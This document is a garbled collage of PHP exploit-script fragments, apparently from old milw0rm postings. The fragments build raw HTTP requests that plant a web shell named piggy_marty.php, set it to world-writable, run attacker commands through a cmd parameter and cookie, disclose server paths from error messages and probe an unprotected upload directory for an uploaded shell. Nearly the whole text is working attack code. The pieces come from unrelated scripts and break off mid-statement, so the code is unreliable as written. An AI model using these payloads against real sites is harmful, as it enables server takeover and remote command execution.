chmod(\'piggy_marty.php\',777);');
$data = "shell={$my_shell}";
$packet = "POST " . $p . "index.php HTTP/1.0\r\n";
$packet .= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, * /*\r\n";
$packet .= "Referer: http://" . $host . $path . "index.php\r\n";
$packet .= "Accept-Language: it\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Accept-Encoding: gzip, deflate\r\n";
$packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$packet .= "Host: " . $host . "\r\n";
$packet .= "Content-Length: " . strlen($data) . "\r\n";
$packet .= "Connection: Close\r\n";
$packet .= "Cache-Control: no-cache\r\n\r\n";
$packet .= $data;
sendpacketii($packet);
echo "StepX - Executing Shell..\r\n";
$packet = "GET " . $p . "piggy_marty.php?cmd={$cmd} HTTP/1.0\r\n";
$packet .= "Host: " . $host . "\r\n";
$packet .= "Cookie: cmd={$cmd}\r\n";
$packet .= "Connection: Close\r\n\r\n";
sendpacketii($packet);
if (strstr($html, "666999")) {
echo "Exploit succeeded...\r\n";
$temp = explode("666999", $html);
die("\r\n" . $temp[1] . "\r\n");
}
# Coded With BH Fast Generator v0.1
?>
# milw0rm.com [2007-05-29]
function execute_commands()
{
global $p, $host, $port, $packet, $command, $html;
$packet = "GET " . $p . "shell.php?cmd=" . urlencode($command) . " HTTP/1.1\r\n";
$packet .= "Host: " . $host . ":" . $port . "\r\n";
$packet .= "Connection: CLose\r\n\r\n";
show($packet);
sendpacketii($packet);
if (eregi("Hi Master", $html)) {
echo "Exploit succeeded...";
die;
} else {
echo "Exploit failed...";
}
}
function disclose_path($paths)
{
global $p, $paths, $host, $html, $application_path;
for ($i = 0; $i <= count($paths) - 1; $i++) {
$packet = "GET " . $p . $paths[$i] . " HTTP/1.1\r\n";
$packet .= "Host: " . $host . "\r\n";
$packet .= "Connection: Close\r\n\r\n";
show($packet);
sendpacketii($packet);
if (eregi('Fatal error', $html)) {
$temp = explode('in <b>', $html);
$temp2 = explode('</b>', $temp[1]);
$result[$i] = $temp2[0];
$temp = explode('/', $paths[$i]);
$temp2 = explode($temp[0], $result[$i]);
$result[$i] = $temp2[0];
echo "<br>" . htmlentities($result[$i]) . "<br>";
$application_path = $result[$i];
break;
}
}
}
}
if (eregi("url=\"", $HtMl)) {
$temp = explode("url=\"", $HtMl);
$temp2 = explode("\"", $temp[1]);
$path_to_shell = $temp2[0];
}
echo "<br>path where I search shell: " . htmlentities($path_to_shell) . "<br>";
# STEP 2 -> Launch commands...
#by default a "UserFiles/File/" dir is generated inside site root when you upload
#files, this dir is not protected by an .htaccess file or whatever
$pAcKeT = "GET " . $path_to_shell . $filename . "?cmd=" . urlencode($cmd) . " HTTP/1.1\r\n";
$pAcKeT .= "User-Agent: GoogleBot/1.1\r\n";
$pAcKeT .= "Host: " . $host . "\r\n";
$pAcKeT .= "Connection: Close\r\n\r\n";
show($pAcKeT);
sendpacketii($pAcKeT);
if (eregi("200 OK", $HtMl)) {
if (eregi("Hi Master!", $HtMl)) {
echo "Exploit succeeded...<br>";
echo "we have a shell in http://" . $host . $path_to_shell . $filename . "<br>";
echo "we should have phpinfo() here, see html...<br>";
die;
} else {
echo "Successfully uploades...<br>\n\t\t\t but is not an executable on target server...<br>";
}
}
refresh();
}
}
#if you are here...
echo "Exploit failed...";
function check_pm()
{
global $p, $host, $cookie, $html;
$packet = "GET " . $p . "pms.php HTTP/1.0\r\n";
$packet .= "Host: " . $host . "\r\n";
$packet .= "User-Agent: Lynx/2.8.3dev.8 libwww-FM/2.14FM\r\n";
$packet .= "Cookie: " . $cookie . "\r\n";
$packet .= "Connection: Close\r\n\r\n";
sendpacketii($packet);
if (eregi("sun-tzu", $html)) {
return true;
} else {
return false;
}
}
